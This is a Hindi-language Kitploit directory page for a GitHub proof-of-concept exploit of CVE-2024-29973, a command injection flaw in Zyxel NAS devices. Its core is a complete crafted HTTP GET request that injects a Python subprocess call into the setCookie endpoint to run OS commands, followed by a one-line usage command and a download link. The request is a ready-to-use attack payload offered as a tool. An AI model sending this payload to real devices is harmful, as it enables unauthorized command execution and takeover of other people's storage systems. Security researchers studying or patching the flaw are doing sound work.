Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-29973 — CVE-2024-29973 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, Zyxel NAS उपकरणों में एक कमांड इंजेक्शन भेद्यता। /cmd,/simZysh/register_main/setCookie एंडपॉइंट पर एक तैयार किए गए HTTP GET अनुरोध के माध्यम से आर्बिट्रेरी OS कमांड निष्पादित करता है। | Kitploit
उपकरण/GitHubGitHub/nanowraith/cve-2024-29973
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubnanowraith/cve-2024-29973

CVE-2024-29973

CVE-2024-29973 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, Zyxel NAS उपकरणों में एक कमांड इंजेक्शन भेद्यता। /cmd,/simZysh/register_main/setCookie एंडपॉइंट पर एक तैयार किए गए HTTP GET अनुरोध के माध्यम से आर्बिट्रेरी OS कमांड निष्पादित करता है।

रिपॉजिटरी देखें
1032 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-29973

image-20240619220245325

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("id",+shell=True)%23 HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: language=en

उपयोग

root@kitploit:~
Python3 CVE-2024-29973.py
टूल डाउनलोड करें